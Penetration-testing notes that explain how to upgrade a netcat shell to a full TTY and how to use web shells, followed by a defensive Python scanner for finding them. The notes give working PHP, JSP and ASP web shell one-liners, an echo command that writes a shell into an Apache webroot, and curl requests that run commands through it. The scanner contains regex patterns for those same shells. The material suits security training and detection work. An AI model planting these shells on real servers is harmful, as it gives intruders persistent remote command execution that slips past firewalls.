TTY
- Date
- 2026-05-17
Often after connecting to a shell using Netcat, our commands are limited. To perform extra commands, the TTY needs to be upgraded by mapping our terminal TTY with the remote TTY.
There are many methods to upgrade the TTY of the target machine. One method is the “python/stty” method:
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
Then hit Ctrl+Z and do the following:
```bash
stty raw -echo
fg
```
Then press Enter twice.
Once we hit `fg`, our netcat shell comes back to the foreground. At this point, the terminal will show a blank line. We can hit Enter again to get back to our shell, or type `reset` and hit Enter to bring it back.
The shell doesn’t cover the entire terminal though. For that, a few variables need to be figured out on our system, and then changed on the remote system:
```bash
echo $TERM
stty size
```
These can then be changed on the remote system as such:
```bash
export TERM=xterm-256color
stty rows 67 columns 318
```
A web shell is typically a web script in PHP or ASPX that accepts commands through HTTP request parameters (GET/POST), executes them, and prints their output back on the web page.
Web Shell Scripts are usually one-liners and are very easy to memorize:
```php
<?php system($_REQUEST["cmd"]); ?>
```
```jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```
```asp
<% eval request("cmd") %>
```
Once we have a web shell script, it needs to be placed in the remote host’s web directory (also called the “webroot”) so that it can be executed through the web browser. This requires exploiting a vulnerability in an upload feature, allowing us to write a shell to a file and upload it, then access that uploaded file to execute commands.
If we only have remote command execution through an exploit, we can write our shell directly to the webroot to access it over the web. So, the first step is to identify where the webroot is.
The following are the default webroots for common web servers:
| Web Server | Default Webroot |
|---|---|
| Apache | /var/www/html/ |
| Nginx | /usr/local/nginx/html/ |
| IIS | c:\inetpub\wwwroot |
| XAMPP | C:\xampp\htdocs |
We can check these directories to see which webroot is in use and then use echo to write out our web shell. As an example:
```bash
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
```
The web shell can then be accessed through the browser:
```
http://IP:PORT/shell.php?cmd=id
```
or by using cURL:
```bash
curl http://IP:PORT/shell.php?cmd=id
```
A great benefit of web shells is that they bypass any firewall restrictions in place, as they don’t open a new connection on a port but run over the web ports 80 or 443 (whatever the web app is using). Even if the host is rebooted, the web shell would still be in place.
Web Shells are not as interactive as reverse and bind shells since different URLs have to be requested to execute commands. However, in extreme cases Python scripts can be used to automate this process and give us a semi-interactive web shell within our local terminal…
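Because a web shell stays in the webroot across reboots and its traffic uses the normal web ports, the file itself is the most reliable thing to hunt for. The scanner below is an added example, not part of the original notes: it flags script files where request input flows straight into a command or eval call, as in the three one-liners above. The signature names, extension list and function names are assumptions made for this example.

```python
import re
from pathlib import Path

# Signatures for the one-liner shapes shown on this page: request-controlled
# input passed directly to a command/eval sink. Constructed for this example.
SIGNATURES = {
    "php-exec-of-request": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(\s*"
        r"\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    "jsp-runtime-exec-of-param": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(\s*"
        r"request\s*\.\s*getParameter", re.I),
    "asp-eval-of-request": re.compile(
        r"\b(eval|execute)\s*\(?\s*request\s*\(", re.I),
}
# Only server-side script types are inspected (assumed list, extend per stack).
SCRIPT_EXTENSIONS = {".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx"}

def scan_text(text):
    """Return the sorted names of every signature that matches `text`."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_webroot(root):
    """Walk `root`; return {path: [signature names]} for matching script files."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTENSIONS:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    import sys
    # Defaults to the Apache webroot from the table above.
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"
    for path, hits in scan_webroot(root).items():
        print(f"{path}: {', '.join(hits)}")
```

A hit is a triage lead rather than proof; pair the scan with file-integrity monitoring of the webroot so that any new or changed script file is reviewed even when no signature matches.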